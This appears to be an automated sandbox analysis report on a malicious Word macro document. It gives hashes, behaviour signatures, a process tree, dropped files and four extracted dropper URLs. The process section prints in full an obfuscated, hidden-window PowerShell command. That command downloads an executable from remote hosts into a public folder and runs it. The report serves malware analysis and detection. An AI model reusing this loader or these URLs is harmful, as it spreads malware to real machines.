Analysis

  • max time kernel
    142s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04/05/2024, 10:00

General

  • Target

    1236ff8f54d16a65d4b8769e898751dc_JaffaCakes118.doc

  • Size

    101KB

  • MD5

    1236ff8f54d16a65d4b8769e898751dc

  • SHA1

    dcda29c090dc9a43ad1af20f7b053939a27c3047

  • SHA256

    c4f0377f14559f123dccc3336687fceeb532ddd392be2d1fe16a7867513c8af9

  • SHA512

    8d003d2a79e601b4c68a5e99eb6083b9005c2c3904e62709c4a20b5adc64af9f12cd96d6859707639618f48bc1e3da7754ae12b8841307ce4c9e3afb1039df36

  • SSDEEP

    1536:dTQ79GRoUes+i+ag/UBzJVigaGKb6Ee3sN:dKGNeLJmYgKWEe3sN

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://pentox.hu/wwLj/

exe.dropper

http://imagesbr.com/W1m4JL4/

exe.dropper

http://ralf-kern.de/trpevrc/

exe.dropper

http://nutrisea.net/UH0J0p/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\1236ff8f54d16a65d4b8769e898751dc_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4964
    • C:\Windows\System32\WindowsPowerShell\v1.0\PowersHeLL.exe
      PowersHeLL -WinDowsTyle hidden -e IAAmACgAIAAoAFsAcwBUAHIASQBOAGcAXQAkAFYARQBSAEIATwBzAGUAUAByAEUARgBlAFIAZQBOAEMARQApAFsAMQAsADMAXQArACcAWAAnAC0AagBPAEkAbgAnACcAKQAgACgAKAAoACcANgBmAFcAbgBzAGEAZABhACcAKwAnAHMAZAAgAD0AIAAmACcAKwAnACgAJwArACcATgAnACsAJwBwAG0AbgBOACcAKwAnAHAAJwArACcAbQAnACsAJwArAE4AJwArACcAcABtAGUATgBwAG0AKwBOAHAAJwArACcAbQB3AC0AbwBiAGoAJwArACcAZQBjACcAKwAnAE4AcABtACsATgBwAG0AdAAnACsAJwBOACcAKwAnAHAAJwArACcAbQAnACsAJwApACcAKwAnACAAcgBhAG4AZAAnACsAJwBvAG0AOwA2AGYAVwBZACcAKwAnAFkAVQAgAD0AIAAuACgATgBwAG0AbgBlAE4AJwArACcAcABtACcAKwAnACsATgBwAG0AdwBOAHAAbQArAE4AJwArACcAcABtAC0AJwArACcAbwBiACcAKwAnAGoAZQAnACsAJwBjACcAKwAnAHQATgBwAG0AKQAgAFMAeQBzAHQAZQBtAC4ATgBlAHQAJwArACcALgBXACcAKwAnAGUAJwArACcAYgAnACsAJwBDAGwAaQAnACsAJwBlAG4AdAA7ADYAJwArACcAZgBXAE4AUwBCACAAJwArACcAPQAgADYAZgAnACsAJwBXAG4AcwAnACsAJwBhAGQAYQAnACsAJwBzACcAKwAnAGQAJwArACcALgBuAGUAeAB0ACcAKwAnACgAMQAnACsAJwAwADAAMAAnACsAJwAwACwAIAAnACsAJwAyACcAKwAnADgAJwArACcAMgAxADMAMwAnACsAJwApADsANgBmAFcAQQBEAEMAWAAgAD0AIAAnACsAJwBOACcAKwAnAHAAbQANACcAKwAnAAoAaAB0AHQAcAA6AC8ALwBmAGEAYwBpAHUAcwBhAC4AYwBvAG0ALwBMAEkAYwAnACsAJwBDAGsALwBAAGgAdAB0AHAAOgAvAC8AcABlAG4AdABvACcAKwAnAHgALgAnACsAJwBoAHUALwB3AHcAJwArACcATABqAC8AJwArACcAQABoAHQAdABwADoALwAvAGkAbQAnACsAJwBhAGcAJwArACcAZQBzACcAKwAnAGIAcgAuAGMAbwAnACsAJwBtAC8AVwAxACcAKwAnAG0AJwArACcANAAnACsAJwBKAEwANAAnACsAJwAvACcAKwAnAEAAJwArACcAaAAnACsAJwB0AHQAJwArACcAcAA6AC8ALwByAGEAbABmAC0AJwArACcAawBlAHIAJwArACcAbgAnACsAJwAuACcAKwAnAGQAZQAvAHQAcgBwACcAKwAnAGUAdgByAGMAJwArACcALwBAAGgAJwArACcAdAAnACsAJwB0ACcAKwAnAHAAOgAnACsAJwAvAC8AbgB1ACcAKwAnAHQAcgAnACsAJwBpAHMAZQBhAC4AbgAnACsAJwBlAHQALwAnACsAJwBVACcAKwAnAEgAJwArACcAMABKACcAKwAnADAAcAAvAE4AcABtAC4AUwAnACsAJwBwAGwAaQB0ACgATgBwAG0AJwArACcAQABOAHAAbQApADsANgBmAFcAUwBEAEMAJwArACcAIAA9ACAANgAnACsAJwBmAFcAJwArACcAZQBuACcAKwAnAHYAJwArACcAOgBwACcAKwAnAHUAYgBsAGkAYwAnACsAJwAgACcAKwAnACsAIABOACcAKwAnAHAAbQBsADUAJwArACcASwBOAHAAbQAgACsAIAAnACsAJwA2AGYAVwBOAFMAQgAgACsAIAAoACcAKwAnAE4AcABtAC4AZQB4ACcAKwAnAE4AcAAnACsAJwBtACsATgBwACcAKwAnAG0AZQAnACsAJwBOAHAAbQApADsAZgBvAHIAZQBhAGMAaAAoADYAZgBXACcAKwAnAGEAJwArACcAcwBmAGMAIAAnACsAJwBpACcAKwAnAG4AIAA2AGYAJwArACcAVwBBAEQAQwAnACsAJwBYACkAJwArACcAewB0ACcAKwAnAHIAeQB7ADYAJwArACcAZgBXAFkAWQBVACcAKwAnAC4AcQAnACsAJwBXADEARABvAEsAagAnACsAJwAyAFcAbgBsAEsAagAyAE8AYQBkAEYASQBLACcAKwAnAGoAMgBsAGUAcQBXACcAKwAnADEAKAAnACsAJwA2AGYAVwBhACcAKwAnAHMAJwArACcAZgAnACsAJwBjACcAKwAnAC4AcQBXADEAVABvAFMAdAByACcAKwAnAEsAJwArACcAagAnACsAJwAyAGkASwBqADIAJwArACcATgAnACsAJwBnAHEAVwAxACgAKQAnACsAJwAsACcAKwAnACAANgAnACsAJwBmAFcAJwArACcAUwBEAEMAKQAnACsAJwA7ACcAKwAnACYAKAAnACsAJwBOAHAAbQBJACcAKwAnAG4AJwArACcAdgBvAE4AcABtACsAJwArACcATgBwAG0AJwArACcAawBOAHAAbQArAE4AcAAnACsAJwBtAGUALQBJACcAKwAnAHQAJwArACcAZQBtAE4AcABtACcAKwAnACkAKAA2AGYAVwBTACcAKwAnAEQAJwArACcAQwApACcAKwAnADsAYgByACcAKwAnAGUAJwArACcAYQBrACcAKwAnADsAfQBjAGEAdABjAGgAewB9ACcAKwAnAH0AJwApACAALQBSAEUAUABsAGEAQwBFACAAIAAnAEsAagAyACcALABbAEMASABhAFIAXQA5ADYAIAAtAFIARQBQAGwAYQBDAEUAKABbAEMASABhAFIAXQAxADAAOAArAFsAQwBIAGEAUgBdADUAMwArAFsAQwBIAGEAUgBdADcANQApACwAWwBDAEgAYQBSAF0AOQAyACAALQBjAHIAZQBwAEwAQQBDAGUAKABbAEMASABhAFIAXQAxADEAMwArAFsAQwBIAGEAUgBdADgANwArAFsAQwBIAGEAUgBdADQAOQApACwAWwBDAEgAYQBSAF0AMwA0ACAALQBjAHIAZQBwAEwAQQBDAGUAIAAoAFsAQwBIAGEAUgBdADUANAArAFsAQwBIAGEAUgBdADEAMAAyACsAWwBDAEgAYQBSAF0AOAA3ACkALABbAEMASABhAFIAXQAzADYAIAAtAFIARQBQAGwAYQBDAEUAJwBOAHAAbQAnACwAWwBDAEgAYQBSAF0AMwA5ACkAKQA=
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1216
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4460 --field-trial-handle=2692,i,8678872182442199182,12502579059484928042,262144 --variations-seed-version /prefetch:8
    1⤵
      PID:1652

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_u0kmivjx.i25.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Public\60829.exe

      Filesize

      177B

      MD5

      89dce080903d2f556569cfad15c7b3be

      SHA1

      abfba475afafa174f316a8fc1e9f0d612d3e6e1e

      SHA256

      b3c154cd1d142396f0b6e5b006cdf677c7d7268b49711ce0567f65dc248e304f

      SHA512

      21f3da3606e2b49b5c98109f8dcbea2e43a560223dfc02376ad3b613a945d87342a1ef54e75ab7b8ac03cd74e9e73ea87921176d10b99b4ad03ae86bafdb490e

    • C:\Users\Public\60829.exe

      Filesize

      4KB

      MD5

      ca45329f00252d30fbfa78fc960ae88e

      SHA1

      59d578b157788b36fe5aa521ba5ffbcb19db551e

      SHA256

      6b0528d8567a9ea0b6359c137e95fcb97379c69e4a9547dc1dca29a8f0ecafd5

      SHA512

      1cb1f20721f8cc0eefec83ae50aa1833dd4a0f45d8119170c149e1b9125f033a55dcaebc42f8994d940b3fa3ffc22c94849054b3836c7bb2f7ea328c85fc7e74

    • C:\Users\Public\60829.exe

      Filesize

      789B

      MD5

      977bc2baa9913be10209f20c5854cf83

      SHA1

      597eeeb0c1b611e9fec64b363e0c367394e874a5

      SHA256

      a6441fb6db7e6668c3fbe90b492c8d5ad298a644959ee198bddab24acd0329e5

      SHA512

      53283b94b59fd1395b0693fc396058b78958747f35f5736f439569d021c87cda9a50179b064ce7cb7adeadcbd20ee8e56b00d7c4ca02de49dbb0842a0c7ec2d7

    • memory/1216-34-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

      Filesize

      2.0MB

    • memory/1216-80-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

      Filesize

      2.0MB

    • memory/1216-44-0x000001D41F420000-0x000001D41F442000-memory.dmp

      Filesize

      136KB

    • memory/4964-10-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

      Filesize

      2.0MB

    • memory/4964-1-0x00007FF8C1AAD000-0x00007FF8C1AAE000-memory.dmp

      Filesize

      4KB

    • memory/4964-9-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

      Filesize

      2.0MB

    • memory/4964-0-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp

      Filesize

      64KB

    • memory/4964-11-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

      Filesize

      2.0MB

    • memory/4964-12-0x00007FF87F9A0000-0x00007FF87F9B0000-memory.dmp

      Filesize

      64KB

    • memory/4964-13-0x00007FF87F9A0000-0x00007FF87F9B0000-memory.dmp

      Filesize

      64KB

    • memory/4964-31-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

      Filesize

      2.0MB

    • memory/4964-32-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

      Filesize

      2.0MB

    • memory/4964-33-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

      Filesize

      2.0MB

    • memory/4964-6-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

      Filesize

      2.0MB

    • memory/4964-7-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp

      Filesize

      64KB

    • memory/4964-5-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

      Filesize

      2.0MB

    • memory/4964-2-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp

      Filesize

      64KB

    • memory/4964-56-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

      Filesize

      2.0MB

    • memory/4964-3-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp

      Filesize

      64KB

    • memory/4964-4-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp

      Filesize

      64KB

    • memory/4964-8-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

      Filesize

      2.0MB

    • memory/4964-82-0x00007FF8C1AAD000-0x00007FF8C1AAE000-memory.dmp

      Filesize

      4KB

    • memory/4964-84-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

      Filesize

      2.0MB

    • memory/4964-85-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

      Filesize

      2.0MB

    • memory/4964-83-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

      Filesize

      2.0MB

    • memory/4964-86-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

      Filesize

      2.0MB

    • memory/4964-88-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

      Filesize

      2.0MB

    • memory/4964-89-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

      Filesize

      2.0MB

    • memory/4964-87-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

      Filesize

      2.0MB

    • memory/4964-92-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

      Filesize

      2.0MB

    • memory/4964-93-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

      Filesize

      2.0MB

    • memory/4964-94-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

      Filesize

      2.0MB

    • memory/4964-113-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp

      Filesize

      64KB

    • memory/4964-115-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp

      Filesize

      64KB

    • memory/4964-116-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp

      Filesize

      64KB

    • memory/4964-114-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp

      Filesize

      64KB

    • memory/4964-117-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

      Filesize

      2.0MB